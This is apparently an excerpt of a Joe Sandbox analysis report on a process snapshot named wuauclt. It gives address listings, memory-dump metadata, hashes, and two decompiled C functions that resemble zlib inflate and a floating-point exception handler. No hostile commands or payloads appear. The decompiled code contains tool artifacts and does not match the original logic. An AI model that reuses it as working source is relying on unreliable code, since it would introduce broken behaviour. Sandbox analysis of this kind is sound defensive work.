                                                0x00252b97
                                                0x00252b9b
                                                0x00252bc0
                                                0x00252bc0
                                                0x00252bc3
                                                0x00252bca
                                                0x00252bcf
                                                0x00252bd2
                                                0x00252bd6
                                                0x00252bde
                                                0x00252be7
                                                0x00252bea
                                                0x00252be0
                                                0x00252be2
                                                0x00252be4
                                                0x00252be4
                                                0x00252bec
                                                0x00252bf0
                                                0x00252bf5
                                                0x00252bf9
                                                0x00252bfb
                                                0x00252c00
                                                0x00252c02
                                                0x00252c06
                                                0x00252c0d
                                                0x00252c11
                                                0x00252c08
                                                0x00252c08
                                                0x00252c0a
                                                0x00252c0a
                                                0x00252c13
                                                0x00252c13
                                                0x00252c00
                                                0x00252c17
                                                0x00252c1d
                                                0x00252cdc
                                                0x00252cdc
                                                0x00252ce0
                                                0x00252ce4
                                                0x00252ce7
                                                0x00252cea
                                                0x00252cec
                                                0x00252cee
                                                0x00252cf1
                                                0x00252cf4
                                                0x00252cf6
                                                0x00252cf8
                                                0x00252cfa
                                                0x00252cfd
                                                0x00252d04
                                                0x00252d16
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00252b9d
                                                0x00252b9d
                                                0x00252ba0
                                                0x00252ba5
                                                0x00000000
                                                0x00252ba7
                                                0x00252ba7
                                                0x00252bab
                                                0x00252bb2
                                                0x00252bb6
                                                0x00252bad
                                                0x00252bad
                                                0x00252baf
                                                0x00252baf
                                                0x00252bba
                                                0x00252bbe
                                                0x00252c23
                                                0x00252c23
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00252bbe
                                                0x00252ba5
                                                0x00252b9b
                                                0x00000000
                                                0x00000000
                                                0x00252d1a
                                                0x00252d1c
                                                0x00252d20
                                                0x00252d23
                                                0x00252d24
                                                0x00252d25
                                                0x00252d25
                                                0x00252d29
                                                0x00252d2c
                                                0x00252d33
                                                0x00252d38
                                                0x00252d3b
                                                0x00252d43
                                                0x00252d7c
                                                0x00252d80
                                                0x00000000
                                                0x00252d45
                                                0x00252d45
                                                0x00252d49
                                                0x00252d4c
                                                0x00252d4f
                                                0x00252d53
                                                0x00252d55
                                                0x00252d5b
                                                0x00252d60
                                                0x00252d63
                                                0x00252d66
                                                0x00252d69
                                                0x00252d7b
                                                0x00252d7b
                                                0x00000000
                                                0x00000000
                                                0x00252d86
                                                0x00252d86
                                                0x00252d8a
                                                0x00252d8e
                                                0x00252d91
                                                0x00252d94
                                                0x00252d96
                                                0x00252d98
                                                0x00252d9b
                                                0x00252d9e
                                                0x00252da2
                                                0x00252da5
                                                0x00252da8
                                                0x00252dab
                                                0x00252dbd
                                                0x00000000
                                                0x00000000
                                                0x00252dbe
                                                0x00252dc2
                                                0x00252dc6
                                                0x00252dc9
                                                0x00252dcc
                                                0x00252dce
                                                0x00252dd0
                                                0x00252dd3
                                                0x00252dd6
                                                0x00252dda
                                                0x00252ddd
                                                0x00252de0
                                                0x00252de3
                                                0x00252df5
                                                0x00000000
                                                0x00000000
                                                0x002526fc
                                                0x00252dfe
                                                0x00252e01
                                                0x00252e08
                                                0x00252e15
                                                0x00252e18
                                                0x00252e1b
                                                0x00252e2d
                                                0x00000000

                                                Strings
                                                • invalid literal/length code, xrefs: 00252C4F
                                                • invalid distance code, xrefs: 00252C9D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: invalid distance code$invalid literal/length code
                                                • API String ID: 0-1393003055
                                                • Opcode ID: 21669172a4bd0762496f2a3f0aabb4b2e5a741d4b3cd96349c8496d998f70c4b
                                                • Instruction ID: 1d7b22b16105239adfe6ad5d48bca13774ba9b59c490396d9fd501045afd7edc
                                                • Opcode Fuzzy Hash: 21669172a4bd0762496f2a3f0aabb4b2e5a741d4b3cd96349c8496d998f70c4b
                                                • Instruction Fuzzy Hash: 031229B4618302CFC708CF29D594A2ABBE1FB89315F14896DE88AC7791D730E958CF59
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 002536F0 Relevance: 2.9, Strings: 2, Instructions: 359COMMONCrypto
                                                Download Yara Rule
                                                C-Code - Quality: 91%
                                                			E002536F0() {
				signed int _t153;
				unsigned int _t155;
				unsigned int _t161;
				signed char _t173;
				signed int _t176;
				intOrPtr _t177;
				signed int _t178;
				signed char _t180;
				signed int _t181;
				intOrPtr _t182;
				intOrPtr _t193;
				signed int _t200;
				intOrPtr _t201;
				signed int _t204;
				signed int _t212;
				signed int _t219;
				signed int _t235;
				signed int _t240;
				void* _t241;
				void* _t242;
				void* _t243;
				intOrPtr* _t249;
				signed int _t252;
				signed int _t261;
				signed int _t267;
				unsigned int _t270;
				unsigned int _t273;
				char* _t279;
				char* _t280;
				char* _t281;
				char* _t282;
				char* _t283;
				intOrPtr _t284;
				intOrPtr _t285;
				void* _t286;
				intOrPtr* _t287;
				signed int _t289;
				intOrPtr _t290;
				void* _t291;
				intOrPtr* _t295;
				intOrPtr* _t297;
				intOrPtr* _t299;
				intOrPtr* _t301;
				signed int _t305;
				signed int _t309;
				intOrPtr* _t313;
				intOrPtr _t317;
				void* _t320;
				intOrPtr _t321;
				signed int _t323;
				intOrPtr _t325;
				intOrPtr _t326;
				signed int _t327;
				void* _t328;
				void* _t330;
				void* _t331;

				_t153 =  *(_t331 + 0x2c);
				_t204 =  *(_t331 + 0x28);
				_t316 =  *_t153;
				_t270 =  *(_t204 + 0x20);
				_t284 =  *((intOrPtr*)(_t204 + 0x30));
				_t279 =  *((intOrPtr*)(_t204 + 0x34));
				 *((intOrPtr*)(_t331 + 0x10)) =  *((intOrPtr*)(_t153 + 4));
				_t155 =  *(_t204 + 0x1c);
				 *((intOrPtr*)(_t331 + 0x18)) = _t316;
				if(_t279 >= _t284) {
					 *((intOrPtr*)(_t331 + 0x14)) =  *((intOrPtr*)(_t204 + 0x2c)) - _t279;
				} else {
					 *((intOrPtr*)(_t331 + 0x14)) = _t284 - _t279 - 1;
				}
				 *(_t331 + 0x1c) =  *(0x2723c8 +  *(_t331 + 0x28) * 4);
				 *(_t331 + 0x20) =  *(0x2723c8 +  *(_t331 + 0x2c) * 4);
				L4:
				while(1) {
					if(_t155 < 0x14) {
						do {
							 *((intOrPtr*)(_t331 + 0x10)) =  *((intOrPtr*)(_t331 + 0x10)) - 1;
							_t289 = 0 << _t155;
							_t155 = _t155 + 8;
							_t270 = _t270 | _t289;
							_t316 = _t316 + 1;
						} while (_t155 < 0x14);
						 *((intOrPtr*)(_t331 + 0x18)) = _t316;
					}
					_t285 =  *((intOrPtr*)(_t331 + 0x30));
					_t212 =  *(_t331 + 0x1c) & _t270;
					_t173 =  *((intOrPtr*)(_t285 + _t212 * 8));
					_t286 = _t285 + _t212 * 8;
					if(0 == 0) {
						L35:
						_t270 = _t270 >>  *(_t286 + 1);
						_t155 = _t155;
						 *_t279 =  *((intOrPtr*)(_t286 + 4));
						_t279 = _t279 + 1;
						 *((intOrPtr*)(_t331 + 0x14)) =  *((intOrPtr*)(_t331 + 0x14)) - 1;
						goto L36;
					} else {
						_t270 = _t270 >>  *(_t286 + 1);
						_t155 = _t155;
						 *(_t331 + 0x28) = 0;
						if((_t173 & 0x00000010) != 0) {
							L12:
							_t178 = _t173 & 0x0000000f;
							_t161 = _t155 - _t178;
							 *(_t331 + 0x2c) = ( *(0x2723c8 + _t178 * 4) & _t270) +  *((intOrPtr*)(_t286 + 4));
							_t273 = _t270 >> _t178;
							if(_t161 < 0xf) {
								do {
									 *((intOrPtr*)(_t331 + 0x10)) =  *((intOrPtr*)(_t331 + 0x10)) - 1;
									_t309 = 0 << _t161;
									_t161 = _t161 + 8;
									_t273 = _t273 | _t309;
									_t316 = _t316 + 1;
								} while (_t161 < 0xf);
								 *((intOrPtr*)(_t331 + 0x18)) = _t316;
							}
							_t290 =  *((intOrPtr*)(_t331 + 0x34));
							_t235 =  *(_t331 + 0x20) & _t273;
							_t180 =  *((intOrPtr*)(_t290 + _t235 * 8));
							_t291 = _t290 + _t235 * 8;
							_t270 = _t273 >>  *(_t291 + 1);
							_t155 = _t161;
							 *(_t331 + 0x28) = 0;
							if((_t180 & 0x00000010) != 0) {
								L18:
								_t181 = _t180 & 0x0000000f;
								while(_t155 < _t181) {
									 *((intOrPtr*)(_t331 + 0x10)) =  *((intOrPtr*)(_t331 + 0x10)) - 1;
									_t323 = 0 << _t155;
									_t155 = _t155 + 8;
									_t270 = _t270 | _t323;
									_t316 =  *((intOrPtr*)(_t331 + 0x18)) + 1;
									 *((intOrPtr*)(_t331 + 0x18)) =  *((intOrPtr*)(_t331 + 0x18)) + 1;
								}
								_t320 = ( *(0x2723c8 + _t181 * 4) & _t270) +  *((intOrPtr*)(_t291 + 4));
								_t270 = _t270 >> _t181;
								_t240 =  *(_t331 + 0x2c);
								_t155 = _t155 - _t181;
								 *((intOrPtr*)(_t331 + 0x14)) =  *((intOrPtr*)(_t331 + 0x14)) - _t240;
								_t295 = _t279 - _t320;
								_t321 =  *((intOrPtr*)(_t331 + 0x38));
								_t182 =  *((intOrPtr*)(_t321 + 0x28));
								if(_t295 >= _t182) {
									 *_t279 =  *_t295;
									_t280 = _t279 + 1;
									 *_t280 =  *((intOrPtr*)(_t295 + 1));
									_t281 = _t280 + 1;
									_t297 = _t295 + 2;
									_t241 = _t240 - 2;
									do {
										 *_t281 =  *_t297;
										_t281 = _t281 + 1;
										_t297 = _t297 + 1;
										_t241 = _t241 - 1;
									} while (_t241 != 0);
									_t316 =  *((intOrPtr*)(_t331 + 0x18));
								} else {
									_t327 =  *(_t321 + 0x2c);
									 *(_t331 + 0x28) = _t327;
									_t328 = _t327 - _t182;
									do {
										_t295 = _t295 + _t328;
									} while (_t295 < _t182);
									_t330 =  *(_t331 + 0x28) - _t295;
									if(_t240 <= _t330) {
										 *_t279 =  *_t295;
										_t282 = _t279 + 1;
										 *_t282 =  *((intOrPtr*)(_t295 + 1));
										_t283 = _t282 + 1;
										_t299 = _t295 + 2;
										_t242 = _t240 - 2;
										do {
											 *_t283 =  *_t299;
											_t283 = _t283 + 1;
											_t299 = _t299 + 1;
											_t242 = _t242 - 1;
										} while (_t242 != 0);
										_t316 =  *((intOrPtr*)(_t331 + 0x18));
									} else {
										_t243 = _t240 - _t330;
										do {
											 *_t279 =  *_t295;
											_t279 = _t279 + 1;
											_t295 = _t295 + 1;
											_t330 = _t330 - 1;
										} while (_t330 != 0);
										_t301 =  *((intOrPtr*)( *((intOrPtr*)(_t331 + 0x38)) + 0x28));
										do {
											 *_t279 =  *_t301;
											_t279 = _t279 + 1;
											_t301 = _t301 + 1;
											_t243 = _t243 - 1;
										} while (_t243 != 0);
										_t316 =  *((intOrPtr*)(_t331 + 0x18));
									}
								}
								L36:
								if( *((intOrPtr*)(_t331 + 0x14)) < 0x102 ||  *((intOrPtr*)(_t331 + 0x10)) < 0xa) {
									_t287 =  *((intOrPtr*)(_t331 + 0x3c));
									_t219 =  *((intOrPtr*)(_t287 + 4)) -  *((intOrPtr*)(_t331 + 0x10));
									_t176 = _t155 >> 3;
									if(_t176 < _t219) {
										_t219 = _t176;
									}
									_t177 =  *((intOrPtr*)(_t331 + 0x38));
									_t317 = _t316 - _t219;
									 *(_t177 + 0x20) = _t270;
									 *((intOrPtr*)(_t177 + 0x1c)) = _t155 - _t219 * 8;
									 *((intOrPtr*)(_t287 + 4)) = _t219 +  *((intOrPtr*)(_t331 + 0x10));
									 *_t287 = _t317;
									 *((intOrPtr*)(_t287 + 8)) =  *((intOrPtr*)(_t287 + 8)) + _t317 -  *_t287;
									 *((intOrPtr*)(_t177 + 0x34)) = _t279;
									return 0;
								} else {
									continue;
								}
							} else {
								while((_t180 & 0x00000040) == 0) {
									_t252 = ( *(0x2723c8 + _t180 * 4) & _t270) +  *((intOrPtr*)(_t291 + 4));
									_t180 =  *((intOrPtr*)(_t291 + _t252 * 8));
									_t291 = _t291 + _t252 * 8;
									_t270 = _t270 >>  *(_t291 + 1);
									_t155 = _t155;
									 *(_t331 + 0x28) = 0;
									if((_t180 & 0x00000010) == 0) {
										continue;
									} else {
										goto L18;
									}
									goto L51;
								}
								_t249 =  *((intOrPtr*)(_t331 + 0x3c));
								 *(_t249 + 0x18) = "invalid distance code";
								 *(_t331 + 0x2c) =  *((intOrPtr*)(_t249 + 4)) -  *((intOrPtr*)(_t331 + 0x10));
								_t305 = _t155 >> 3;
								if(_t305 >=  *(_t331 + 0x2c)) {
									goto L49;
								}
								goto L50;
							}
						} else {
							while((_t173 & 0x00000040) == 0) {
								_t267 = ( *(0x2723c8 + _t173 * 4) & _t270) +  *((intOrPtr*)(_t286 + 4));
								_t173 =  *((intOrPtr*)(_t286 + _t267 * 8));
								_t286 = _t286 + _t267 * 8;
								if(0 == 0) {
									goto L35;
								} else {
									_t270 = _t270 >>  *(_t286 + 1);
									_t155 = _t155;
									 *(_t331 + 0x28) = 0;
									if((_t173 & 0x00000010) == 0) {
										continue;
									} else {
										goto L12;
									}
								}
								goto L51;
							}
							if((_t173 & 0x00000020) == 0) {
								_t249 =  *((intOrPtr*)(_t331 + 0x3c));
								 *(_t249 + 0x18) = "invalid literal/length code";
								 *(_t331 + 0x2c) =  *((intOrPtr*)(_t249 + 4)) -  *((intOrPtr*)(_t331 + 0x10));
								_t305 = _t155 >> 3;
								if(_t305 >=  *(_t331 + 0x2c)) {
									L49:
									_t305 =  *(_t331 + 0x2c);
								}
								L50:
								_t193 =  *((intOrPtr*)(_t331 + 0x38));
								_t325 = _t316 - _t305;
								 *(_t193 + 0x20) = _t270;
								 *((intOrPtr*)(_t193 + 0x1c)) = _t155 - _t305 * 8;
								 *((intOrPtr*)(_t249 + 4)) = _t305 +  *((intOrPtr*)(_t331 + 0x10));
								 *_t249 = _t325;
								 *((intOrPtr*)(_t249 + 8)) =  *((intOrPtr*)(_t249 + 8)) + _t325 -  *_t249;
								 *((intOrPtr*)(_t193 + 0x34)) = _t281;
								return 0xfffffffd;
							} else {
								_t313 =  *((intOrPtr*)(_t331 + 0x3c));
								_t261 =  *((intOrPtr*)(_t313 + 4)) -  *((intOrPtr*)(_t331 + 0x10));
								_t200 = _t155 >> 3;
								if(_t200 < _t261) {
									_t261 = _t200;
								}
								_t201 =  *((intOrPtr*)(_t331 + 0x38));
								_t326 = _t316 - _t261;
								 *(_t201 + 0x20) = _t270;
								 *((intOrPtr*)(_t201 + 0x1c)) = _t155 - _t261 * 8;
								 *((intOrPtr*)(_t313 + 4)) = _t261 +  *((intOrPtr*)(_t331 + 0x10));
								 *_t313 = _t326;
								 *((intOrPtr*)(_t313 + 8)) =  *((intOrPtr*)(_t313 + 8)) + _t326 -  *_t313;
								 *((intOrPtr*)(_t201 + 0x34)) = _t281;
								return 1;
							}
						}
					}
					L51:
				}
			}



























































                                                0x002536f3
                                                0x002536f7
                                                0x002536fd
                                                0x00253702
                                                0x00253706
                                                0x0025370a
                                                0x0025370d
                                                0x00253711
                                                0x00253716
                                                0x0025371a
                                                0x0025372a
                                                0x0025371c
                                                0x0025371f
                                                0x0025371f
                                                0x00253739
                                                0x00253748
                                                0x00000000
                                                0x0025374c
                                                0x0025374f
                                                0x00253751
                                                0x00253756
                                                0x00253763
                                                0x00253765
                                                0x00253768
                                                0x0025376a
                                                0x0025376b
                                                0x00253770
                                                0x00253770
                                                0x00253778
                                                0x0025377c
                                                0x00253780
                                                0x00253783
                                                0x00253788
                                                0x00253945
                                                0x0025394a
                                                0x0025394c
                                                0x00253951
                                                0x00253957
                                                0x00253959
                                                0x00000000
                                                0x0025378e
                                                0x00253793
                                                0x00253795
                                                0x00253797
                                                0x0025379e
                                                0x002537d9
                                                0x002537d9
                                                0x002537dc
                                                0x002537ea
                                                0x002537f0
                                                0x002537f5
                                                0x002537f7
                                                0x002537fc
                                                0x00253809
                                                0x0025380b
                                                0x0025380e
                                                0x00253810
                                                0x00253811
                                                0x00253816
                                                0x00253816
                                                0x0025381e
                                                0x00253822
                                                0x00253826
                                                0x00253829
                                                0x00253831
                                                0x00253833
                                                0x00253835
                                                0x0025383c
                                                0x0025386f
                                                0x0025386f
                                                0x00253874
                                                0x0025387b
                                                0x00253888
                                                0x0025388a
                                                0x0025388d
                                                0x00253893
                                                0x00253896
                                                0x00253896
                                                0x002538ac
                                                0x002538b0
                                                0x002538b2
                                                0x002538b6
                                                0x002538ba
                                                0x002538c0
                                                0x002538c2
                                                0x002538c6
                                                0x002538cb
                                                0x00253928
                                                0x0025392d
                                                0x0025392f
                                                0x00253931
                                                0x00253932
                                                0x00253933
                                                0x00253936
                                                0x00253938
                                                0x0025393a
                                                0x0025393b
                                                0x0025393c
                                                0x0025393c
                                                0x0025393f
                                                0x002538cd
                                                0x002538cd
                                                0x002538d0
                                                0x002538d4
                                                0x002538d6
                                                0x002538d6
                                                0x002538d8
                                                0x002538e0
                                                0x002538e4
                                                0x00253909
                                                0x0025390e
                                                0x00253910
                                                0x00253912
                                                0x00253913
                                                0x00253914
                                                0x00253917
                                                0x00253919
                                                0x0025391b
                                                0x0025391c
                                                0x0025391d
                                                0x0025391d
                                                0x00253920
                                                0x002538e6
                                                0x002538e6
                                                0x002538e8
                                                0x002538ea
                                                0x002538ec
                                                0x002538ed
                                                0x002538ee
                                                0x002538ee
                                                0x002538f5
                                                0x002538f8
                                                0x002538fa
                                                0x002538fc
                                                0x002538fd
                                                0x002538fe
                                                0x002538fe
                                                0x00253901
                                                0x00253901
                                                0x002538e4
                                                0x0025395d
                                                0x00253965
                                                0x002539a1
                                                0x002539ac
                                                0x002539b0
                                                0x002539b5
                                                0x002539b7
                                                0x002539b7
                                                0x002539b9
                                                0x002539bd
                                                0x002539bf
                                                0x002539cb
                                                0x002539d9
                                                0x002539de
                                                0x002539e4
                                                0x002539e7
                                                0x002539f3
                                                0x0025396e
                                                0x00000000
                                                0x0025396e
                                                0x0025383e
                                                0x0025383e
                                                0x00253853
                                                0x00253857
                                                0x0025385a
                                                0x00253862
                                                0x00253864
                                                0x00253866
                                                0x0025386d
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0025386d
                                                0x00253973
                                                0x0025397e
                                                0x00253987
                                                0x00253991
                                                0x00253996
                                                0x00000000
                                                0x0025399c
                                                0x00000000
                                                0x00253996
                                                0x002537a0
                                                0x002537a0
                                                0x002537b5
                                                0x002537b9
                                                0x002537bc
                                                0x002537c1
                                                0x00000000
                                                0x002537c7
                                                0x002537cc
                                                0x002537ce
                                                0x002537d0
                                                0x002537d7
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x002537d7
                                                0x00000000
                                                0x002537c1
                                                0x002539f7
                                                0x00253a4f
                                                0x00253a5a
                                                0x00253a63
                                                0x00253a6d
                                                0x00253a72
                                                0x00253a74
                                                0x00253a74
                                                0x00253a74
                                                0x00253a78
                                                0x00253a78
                                                0x00253a7c
                                                0x00253a7e
                                                0x00253a8c
                                                0x00253a98
                                                0x00253a9f
                                                0x00253aa3
                                                0x00253aa6
                                                0x00253ab5
                                                0x002539f9
                                                0x002539f9
                                                0x00253a04
                                                0x00253a08
                                                0x00253a0d
                                                0x00253a0f
                                                0x00253a0f
                                                0x00253a11
                                                0x00253a15
                                                0x00253a17
                                                0x00253a23
                                                0x00253a31
                                                0x00253a36
                                                0x00253a3c
                                                0x00253a3f
                                                0x00253a4e
                                                0x00253a4e
                                                0x002539f7
                                                0x0025379e
                                                0x00000000
                                                0x00253788

                                                Strings
                                                • invalid literal/length code, xrefs: 00253A5A
                                                • invalid distance code, xrefs: 0025397E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: invalid distance code$invalid literal/length code
                                                • API String ID: 0-1393003055
                                                • Opcode ID: dfcecbe77876db2b95983f1219045aa8d42e0c68885754db6c5709ad2d12fb54
                                                • Instruction ID: e918c653d758a635eba99cb8af926c08c84e7ab420ed12ad000a4ab06df90bc4
                                                • Opcode Fuzzy Hash: dfcecbe77876db2b95983f1219045aa8d42e0c68885754db6c5709ad2d12fb54
                                                • Instruction Fuzzy Hash: 5FD1D5756183428FCB18CF2CD49026AFBE1EB99350F185A6DECDA93341C770E959CB89
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00266D3C Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODECrypto
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00266D3C(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
				signed int _t172;
				signed int _t175;
				signed int _t178;
				signed int* _t179;
				signed int _t195;
				signed int _t199;
				signed int _t202;
				void* _t203;
				void* _t206;
				signed int _t209;
				void* _t210;
				signed int _t225;
				unsigned int* _t240;
				signed char _t242;
				signed int* _t250;
				unsigned int* _t256;
				signed int* _t257;
				signed char _t259;
				long _t262;
				signed int* _t265;

				 *(_a4 + 4) = 0;
				_t262 = 0xc000000d;
				 *(_a4 + 8) = 0;
				 *(_a4 + 0xc) = 0;
				_t242 = _a12;
				if((_t242 & 0x00000010) != 0) {
					_t262 = 0xc000008f;
					 *(_a4 + 4) =  *(_a4 + 4) | 1;
				}
				if((_t242 & 0x00000002) != 0) {
					_t262 = 0xc0000093;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
				}
				if((_t242 & 0x00000001) != 0) {
					_t262 = 0xc0000091;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
				}
				if((_t242 & 0x00000004) != 0) {
					_t262 = 0xc000008e;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
				}
				if((_t242 & 0x00000008) != 0) {
					_t262 = 0xc0000090;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
				}
				_t265 = _a8;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 << 4) ^  *(_a4 + 8)) & 0x00000010;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 +  *_t265) ^  *(_a4 + 8)) & 0x00000008;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 1) ^  *(_a4 + 8)) & 0x00000004;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 3) ^  *(_a4 + 8)) & 0x00000002;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 5) ^  *(_a4 + 8)) & 1;
				_t259 = E00264CA2(_a4);
				if((_t259 & 0x00000001) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
				}
				if((_t259 & 0x00000004) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
				}
				if((_t259 & 0x00000008) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
				}
				if((_t259 & 0x00000010) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
				}
				if((_t259 & 0x00000020) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
				}
				_t172 =  *_t265 & 0x00000c00;
				if(_t172 == 0) {
					 *_a4 =  *_a4 & 0xfffffffc;
				} else {
					if(_t172 == 0x400) {
						_t257 = _a4;
						_t225 =  *_t257 & 0xfffffffd | 1;
						L26:
						 *_t257 = _t225;
						L29:
						_t175 =  *_t265 & 0x00000300;
						if(_t175 == 0) {
							_t250 = _a4;
							_t178 =  *_t250 & 0xffffffeb | 0x00000008;
							L35:
							 *_t250 = _t178;
							L36:
							_t179 = _a4;
							_t254 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
							if(_a28 == 0) {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
								 *((long long*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t254 = _a4;
								_t240 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
								 *(_a4 + 0x50) =  *_t240;
							} else {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t240 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
								 *(_a4 + 0x50) =  *_t240;
							}
							E00264C08(_t254);
							RaiseException(_t262, 0, 1,  &_a4);
							_t256 = _a4;
							if((_t256[2] & 0x00000010) != 0) {
								 *_t265 =  *_t265 & 0xfffffffe;
							}
							if((_t256[2] & 0x00000008) != 0) {
								 *_t265 =  *_t265 & 0xfffffffb;
							}
							if((_t256[2] & 0x00000004) != 0) {
								 *_t265 =  *_t265 & 0xfffffff7;
							}
							if((_t256[2] & 0x00000002) != 0) {
								 *_t265 =  *_t265 & 0xffffffef;
							}
							if((_t256[2] & 0x00000001) != 0) {
								 *_t265 =  *_t265 & 0xffffffdf;
							}
							_t195 =  *_t256 & 0x00000003;
							if(_t195 == 0) {
								 *_t265 =  *_t265 & 0xfffff3ff;
							} else {
								_t206 = _t195 - 1;
								if(_t206 == 0) {
									_t209 =  *_t265 & 0xfffff7ff | 0x00000400;
									L55:
									 *_t265 = _t209;
									L58:
									_t199 =  *_t256 >> 0x00000002 & 0x00000007;
									if(_t199 == 0) {
										_t202 =  *_t265 & 0xfffff3ff | 0x00000300;
										L64:
										 *_t265 = _t202;
										L65:
										if(_a28 == 0) {
											 *_t240 = _t256[0x14];
										} else {
											 *_t240 = _t256[0x14];
										}
										return _t202;
									}
									_t203 = _t199 - 1;
									if(_t203 == 0) {
										_t202 =  *_t265 & 0xfffff3ff | 0x00000200;
										goto L64;
									}
									_t202 = _t203 - 1;
									if(_t202 == 0) {
										 *_t265 =  *_t265 & 0xfffff3ff;
									}
									goto L65;
								}
								_t210 = _t206 - 1;
								if(_t210 == 0) {
									_t209 =  *_t265 & 0xfffffbff | 0x00000800;
									goto L55;
								}
								if(_t210 == 1) {
									 *_t265 =  *_t265 | 0x00000c00;
								}
							}
							goto L58;
						}
						if(_t175 == 0x200) {
							_t250 = _a4;
							_t178 =  *_t250 & 0xffffffe7 | 0x00000004;
							goto L35;
						}
						if(_t175 == 0x300) {
							 *_a4 =  *_a4 & 0xffffffe3;
						}
						goto L36;
					}
					if(_t172 == 0x800) {
						_t257 = _a4;
						_t225 =  *_t257 & 0xfffffffe | 0x00000002;
						goto L26;
					}
					if(_t172 == 0xc00) {
						 *_a4 =  *_a4 | 0x00000003;
					}
				}
			}























                                                0x00266d4a
                                                0x00266d51
                                                0x00266d56
                                                0x00266d5c
                                                0x00266d5f
                                                0x00266d65
                                                0x00266d6a
                                                0x00266d6f
                                                0x00266d6f
                                                0x00266d75
                                                0x00266d7a
                                                0x00266d7f
                                                0x00266d7f
                                                0x00266d86
                                                0x00266d8b
                                                0x00266d90
                                                0x00266d90
                                                0x00266d97
                                                0x00266d9c
                                                0x00266da1
                                                0x00266da1
                                                0x00266da8
                                                0x00266dad
                                                0x00266db2
                                                0x00266db2
                                                0x00266dba
                                                0x00266dca
                                                0x00266ddc
                                                0x00266dee
                                                0x00266e01
                                                0x00266e13
                                                0x00266e1b
                                                0x00266e20
                                                0x00266e25
                                                0x00266e25
                                                0x00266e2c
                                                0x00266e31
                                                0x00266e31
                                                0x00266e38
                                                0x00266e3d
                                                0x00266e3d
                                                0x00266e44
                                                0x00266e49
                                                0x00266e49
                                                0x00266e50
                                                0x00266e55
                                                0x00266e55
                                                0x00266e5f
                                                0x00266e61
                                                0x00266e9b
                                                0x00266e63
                                                0x00266e68
                                                0x00266e8c
                                                0x00266e94
                                                0x00266e88
                                                0x00266e88
                                                0x00266e9e
                                                0x00266ea5
                                                0x00266ea7
                                                0x00266ec9
                                                0x00266ed1
                                                0x00266ed4
                                                0x00266ed4
                                                0x00266ed6
                                                0x00266ed6
                                                0x00266ee1
                                                0x00266ee7
                                                0x00266eec
                                                0x00266ef3
                                                0x00266f2d
                                                0x00266f38
                                                0x00266f3e
                                                0x00266f41
                                                0x00266f44
                                                0x00266f50
                                                0x00266f58
                                                0x00266ef5
                                                0x00266ef8
                                                0x00266f04
                                                0x00266f0a
                                                0x00266f10
                                                0x00266f13
                                                0x00266f1c
                                                0x00266f1c
                                                0x00266f5b
